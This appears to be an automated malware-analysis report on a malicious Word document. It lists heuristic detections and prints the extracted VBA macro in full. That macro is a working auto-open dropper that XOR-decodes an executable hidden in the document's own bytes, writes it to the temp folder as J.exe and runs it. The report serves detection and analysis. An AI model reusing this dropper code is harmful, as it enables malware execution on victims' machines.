MALICIOUS
228
Risk Score
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Open (f.getspecialfolder(2) + "\\J.exe") For Binary As #1: Put #1, 1, a: Close #1: Shell (f.getspecialfolder(2) + "\\J.exe") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set f = CreateObject("scripting.filesystemobject"): Set e = f.getfile(a1): -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 728,576 bytes but its declared streams total only 130,266 bytes — 598,310 bytes (82%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1030 bytes |
SHA-256: 2f5ffe4ff1aa8547bf2bbf5909af61bab257c0c16ff2c6acfe5de7b86293babb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub autoopen()
a1 = ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name
Set f = CreateObject("scripting.filesystemobject"): Set e = f.getfile(a1):
Dim a(592384 - 1) As Byte: s = e.Size - UBound(a) - 1: Dim b(1375733) As Byte:
Open (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name) For Binary As #7: Get #7, 1, b: Close #7:
Dim key(5) As Byte
key(0) = 1: key(1) = 2: key(2) = 3: key(3) = 4: key(4) = 5:
j = 0
For i = 0 To (e.Size - s - 1)
If (5 = j) Then j = 0
a(i) = b(s + i) Xor key(j)
j = j + 1
Next
Open (f.getspecialfolder(2) + "\\J.exe") For Binary As #1: Put #1, 1, a: Close #1: Shell (f.getspecialfolder(2) + "\\J.exe")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.